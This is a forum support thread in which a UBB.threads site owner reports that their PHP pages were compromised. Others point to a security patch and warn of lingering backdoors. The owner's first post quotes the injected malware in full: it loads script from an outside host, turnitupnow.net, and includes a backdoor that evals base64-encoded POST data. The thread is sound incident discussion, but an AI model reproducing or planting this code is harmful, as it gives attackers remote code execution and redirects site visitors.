Some Russian crap site re-director somehow comprised all the php on our web site. No idea how - anyway I can see his code in every php header of page -

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }


I can see it in these two pages ultimatebb.php ---ubbaccel_test.php any other php pages in other directories?

Will I void my support if I remove it all?

Next - is how did they do it?

What version of ubb are you running?

You may want to read this UBB security update announcement:

http://www.ubbcentral.com/forums/ubbthreads.php/topics/245827/IMPORTANT_UBB_THREADS_SECURITY

7.5.4.2

so I went and downloaded the patch - #12 ( I have 7.5.4.2)

Uploaded and overwrote the directories. After flushing cache - How do I verify the patch is functional?

should say something like this at the bottom of the board...

Powered by UBB.threads™ 7.5.6p2

nope - nothing yet

Well, just installing a patch isn't going to fix the problems you have now; it's likely that an attacker has installed a backdoor to allow them to come in and make a mess whenever they want (like the hackers did on most of the forums which where hit a month ago)... You should consider hiring someone to dig through your webspace to check for any of them.

Well, if it doesn't show that it's been patched, and you've cleared the cache, you should try re-applying the patch and clearing the cache again... If that doesn't work, try deleting everything from /cache and /templates/compiled and then clear the cache again (or consider paying someone to upgrade you to the latest build; plenty of us offer these services)

I had an issue with file permissions when I installed the files... after I went back and fixed those permissions everything came up correctly.

Dunny